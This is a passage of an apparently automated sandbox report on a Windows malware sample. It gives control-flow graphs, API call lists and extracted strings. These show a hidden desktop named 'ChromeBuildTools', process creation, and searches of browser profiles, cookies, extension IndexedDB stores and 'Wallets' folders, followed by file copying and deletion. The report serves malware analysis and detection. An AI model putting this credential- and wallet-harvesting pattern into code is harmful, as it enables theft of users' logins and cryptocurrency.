                                                                                                                                                                                                                                                                                                  control_flow_graph 3258 407060-407087 3259 407096 3258->3259 3260 407089-407094 strlen 3258->3260 3261 407098-40709d 3259->3261 3260->3261 3262 4070d6-4070e8 call 40f390 3261->3262 3263 40709f-4070a2 3261->3263 3273 4070f5 3262->3273 3274 4070ea-4070f3 strlen 3262->3274 3265 4070a4-4070a9 3263->3265 3266 407109-40714a call 402510 memcpy OpenDesktopA 3263->3266 3268 4070b5-4070c0 call 40eca0 3265->3268 3269 4070ab-4070b3 call 402520 3265->3269 3276 40716c-40721f call 407660 call 411550 call 410530 call 4119b0 lstrcpyA call 410230 call 411fa0 3266->3276 3277 40714c-407166 CreateDesktopA 3266->3277 3268->3262 3281 4070c2-4070c8 3268->3281 3269->3281 3279 4070f7-407106 call 406b00 3273->3279 3274->3279 3298 407221-40722a strlen 3276->3298 3299 40722c 3276->3299 3277->3276 3284 4070ca 3281->3284 3285 4070cc-4070d3 3281->3285 3284->3285 3285->3262 3300 40722e-40723f call 402400 3298->3300 3299->3300 3303 407264-40726c call 406fe0 3300->3303 3306 40727b-407283 3303->3306 3307 40726e-407274 3303->3307 3310 407285-407294 3306->3310 3311 4072c8-4072e5 3306->3311 3308 407250-407262 call 411fa0 Sleep 3307->3308 3309 407276-407279 3307->3309 3308->3303 3308->3306 3309->3308 3314 407296-407298 3310->3314 3315 4072bf-4072c5 ??3@YAXPAX@Z 3310->3315 3313 407303-40734c CreateProcessA 3311->3313 3317 4074c2-4074df 3313->3317 3318 407352-40738b Sleep call 410200 3313->3318 3319 40764d-407652 _invalid_parameter_noinfo_noreturn 3314->3319 3320 40729e-4072a3 3314->3320 3315->3311 3322 4074e1-4074e7 strlen 3317->3322 3323 4074ea-40750f call 402400 call 406b00 3317->3323 3326 407390-4073ec call 410200 * 3 call 406bc0 3318->3326 3320->3319 3324 4072a9-4072ae 3320->3324 3322->3323 3335 407511-40751a strlen 3323->3335 3336 40751c-407559 call 406b00 * 2 call 4101c0 3323->3336 3324->3319 3325 4072b4-4072b7 3324->3325 3325->3319 3328 4072bd 3325->3328 3346 4073f2-407412 call 411fa0 3326->3346 3347 40760c-40760f call 412050 3326->3347 3328->3315 3335->3336 3354 40755b 3336->3354 3355 40755e-4075d3 call 4101c0 * 2 call 410200 * 4 call 402910 3336->3355 3357 407420 3346->3357 3358 407414-40741d strlen 3346->3358 3352 407614-40761d CloseDesktop 3347->3352 3356 407622-40764a call 410230 * 4 3352->3356 3354->3355 3401 4075d5-4075e4 3355->3401 3402 407608-40760a 3355->3402 3361 407422-407430 call 402400 3357->3361 3358->3361 3370 407454-40745c call 406fe0 3361->3370 3378 407470-407479 3370->3378 3379 40745e-407464 3370->3379 3385 4072f9-4072fd 3378->3385 3386 40747f-40748e 3378->3386 3382 407440-407452 call 411fa0 Sleep 3379->3382 3383 407466-407469 3379->3383 3382->3370 3382->3378 3383->3382 3385->3313 3385->3352 3389 4072f0-4072f6 ??3@YAXPAX@Z 3386->3389 3390 407494-407496 3386->3390 3389->3385 3390->3319 3393 40749c-4074a1 3390->3393 3393->3319 3396 4074a7-4074ac 3393->3396 3396->3319 3398 4074b2-4074b5 3396->3398 3398->3319 3400 4074bb-4074bd 3398->3400 3400->3389 3403 4075e6-4075e8 3401->3403 3404 4075ff-407605 ??3@YAXPAX@Z 3401->3404 3402->3356 3403->3319 3405 4075ea-4075ef 3403->3405 3404->3402 3405->3319 3406 4075f1-4075f6 3405->3406 3406->3319 3407 4075f8-4075fb 3406->3407 3407->3319 3408 4075fd 3407->3408 3408->3404
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ECA0: memcpy.MSVCRT(?,00000010,?,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E), ref: 0040ECC1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ECA0: ??3@YAXPAX@Z.MSVCRT(00000010,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E,00000000,?), ref: 0040ECF3
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$Desktopmemcpy$??3@CreateOpenSleeplstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA$_CreateProcess$cookies$1#v
                                                                                                                                                                                                                                                                                                  • API String ID: 509579932-922304637
                                                                                                                                                                                                                                                                                                  • Opcode ID: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                                  • Instruction ID: 88d1e3b40fbcb0df37290dc8620aa57b8ac853b7570111a731a950e539c68a8a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69F1F431D046049BDB11EF64CD81BEEB7B0AF45304F00456EF90677292EB79A9C5CB9A
                                                                                                                                                                                                                                                                                                  Function 00401730 Relevance: 39.5, APIs: 17, Strings: 5, Instructions: 968filestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 3825 401730-401765 call 4101c0 * 2 3830 401767-40176a 3825->3830 3831 40177a-401782 3825->3831 3832 401784-40178a 3830->3832 3833 40176c-40176e 3830->3833 3834 40178c-4017b8 call 411550 call 4102e0 call 410290 call 410230 * 2 3831->3834 3832->3834 3835 401770-401778 3833->3835 3836 4017bd-4017c4 3833->3836 3834->3836 3835->3834 3838 401834-4018b3 call 4102e0 call 410340 call 4102e0 call 410340 call 4102e0 call 410290 call 410230 * 4 3836->3838 3839 4017c6-40182f call 4102e0 call 410340 call 4102e0 call 410340 call 410290 call 410230 * 3 3836->3839 3880 4018b6-4018df call 410230 call 410530 FindFirstFileA 3838->3880 3839->3880 3889 4021f2-402245 call 410230 * 9 3880->3889 3890 4018e5-4018fd 3880->3890 3926 402248-402260 _invalid_parameter_noinfo_noreturn 3889->3926 3892 401933-401967 call 402400 3890->3892 3897 401980 3892->3897 3898 401969-40197a strlen 3892->3898 3900 401982-401991 3897->3900 3898->3900 3902 4019d0-4019d4 3900->3902 3903 401993-4019a0 3900->3903 3905 401aa7-401ab3 3902->3905 3906 4019da-401a02 call 402400 3902->3906 3907 4019a2 3903->3907 3908 4019a8-4019bb memcmp 3903->3908 3911 401ab5-401ac7 3905->3911 3912 401afb-401afd 3905->3912 3922 401a04-401a15 strlen 3906->3922 3923 401a17 3906->3923 3907->3908 3908->3906 3913 4019bd-4019bf 3908->3913 3916 401af2-401af8 ??3@YAXPAX@Z 3911->3916 3917 401ac9-401acb 3911->3917 3918 401b03-401b16 call 4101c0 3912->3918 3919 40191b-40192d FindNextFileA 3912->3919 3913->3906 3920 4019c1-4019c3 3913->3920 3916->3912 3925 401ad1-401ad6 3917->3925 3917->3926 3943 401eb5-401f4e call 4102e0 call 410340 call 4102e0 call 410340 * 2 call 410290 call 410230 * 5 call 410200 call 411520 3918->3943 3944 401b1c-401be2 call 4102e0 call 410340 call 4102e0 call 410340 * 3 call 4102e0 call 410230 * 6 call 410530 FindFirstFileA 3918->3944 3919->3892 3924 4021c1-4021dd FindClose call 4104e0 * 2 3919->3924 3920->3905 3928 4019c9 3920->3928 3930 401a19-401a25 3922->3930 3923->3930 3924->3889 3925->3926 3931 401adc-401ae1 3925->3931 3940 402363-4023c3 call 410200 * 4 call 401480 3926->3940 3941 402266-402285 3926->3941 3928->3906 3937 401a27-401a2e 3930->3937 3938 401a48-401a4f 3930->3938 3931->3926 3939 401ae7-401aea 3931->3939 3948 401a30 3937->3948 3949 401a33-401a46 memcmp 3937->3949 3951 401a51-401a54 3938->3951 3952 401a57-401a62 3938->3952 3939->3926 3950 401af0 3939->3950 4002 4023c8-4023f0 call 410230 * 4 3940->4002 3953 402290-40234b call 410200 * 7 call 401730 3941->3953 4053 401913-401918 call 410230 3943->4053 4054 401f54-401fe7 call 4101c0 call 410340 * 2 call 4102e0 call 410340 call 410290 call 410230 * 4 3943->4054 4060 401be8-401beb 3944->4060 4061 4021df-4021ef call 410230 * 2 3944->4061 3948->3949 3949->3938 3949->3952 3950->3916 3951->3952 3952->3905 3960 401a64-401a73 3952->3960 4031 402350-40235d 3953->4031 3967 401a75-401a77 3960->3967 3968 401a9e-401aa4 ??3@YAXPAX@Z 3960->3968 3967->3926 3974 401a7d-401a82 3967->3974 3968->3905 3974->3926 3981 401a88-401a8d 3974->3981 3981->3926 3982 401a93-401a96 3981->3982 3982->3926 3989 401a9c 3982->3989 3989->3968 4031->3940 4031->3953 4053->3919 4105 402001-4020e6 call 410340 call 410290 call 410230 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 4054->4105 4106 401fe9-401ffc call 410340 call 410290 call 410230 4054->4106 4064 401c4a-401c9b call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 411520 4060->4064 4061->3889 4097 401c9d-401e0f call 4101c0 call 410340 * 2 call 4102e0 call 410340 call 410290 call 410230 * 4 call 410340 call 410290 call 410230 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 4064->4097 4098 401c2f-401c44 FindNextFileA 4064->4098 4232 401bf0-401c2a call 410530 DeleteFileA call 4104e0 * 2 call 411250 call 410230 * 2 4097->4232 4233 401e15-401eb0 call 410200 * 5 call 413e50 call 410230 4097->4233 4098->4064 4101 401900-401910 FindClose call 410230 4098->4101 4101->4053 4190 402181-4021ba call 410530 DeleteFileA call 4104e0 * 2 call 411250 call 410230 4105->4190 4191 4020ec-40217c call 410200 * 5 call 413e50 call 410230 4105->4191 4106->4105 4190->3924 4191->4190 4232->4098 4233->4232
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,P#@,?,00420BBE,?,?,?,00420BBE,P#@,?,00000028,00000028,?), ref: 004018D4
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00401970
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileFindFirstlstrcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$P#@$P#@$Wallets$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 2655114730-2645412951
                                                                                                                                                                                                                                                                                                  • Opcode ID: 098bd10a0f2ace822b4f538e927eeff24fd1bc9f0dc77ec90ac93b3d6e4b1d5a
                                                                                                                                                                                                                                                                                                  • Instruction ID: f6b8f89bdbb38ad25dbe9b200cedc7393f8838c2c48d913623183ff2efa6fcc7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 098bd10a0f2ace822b4f538e927eeff24fd1bc9f0dc77ec90ac93b3d6e4b1d5a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C572B931A102185BCF14EBA1CD959EEB779AF44304F40409EF9066B192DF7CAEC5CBA9
                                                                                                                                                                                                                                                                                                  Function 0040A5D0 Relevance: 32.0, APIs: 7, Strings: 11, Instructions: 509filestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042150A), ref: 0040A63D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040A738
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlenmemmovestrlen
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$CURRENT$IndexedDB$Local Extension Settings$Opera$Plugins$Sync Extension Settings$Wallets$\*.*$_0.indexeddb.leveldb$chrome-extension_
                                                                                                                                                                                                                                                                                                  • API String ID: 1425610001-450108884
                                                                                                                                                                                                                                                                                                  • Opcode ID: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a3cb996083095315d2ff66196e58a8cf7e0966e26cbd8d21691459e5d96898c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 841243316102589BCB14EBA1CD95AEE7779AF54308F40009EF5066B182DFBC6EC5CBA9
                                                                                                                                                                                                                                                                                                  Function 0040C790 Relevance: 30.4, APIs: 13, Strings: 4, Instructions: 614stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 0040C80A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040C893
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040C8C2
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040C91D
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C94B
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C9AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
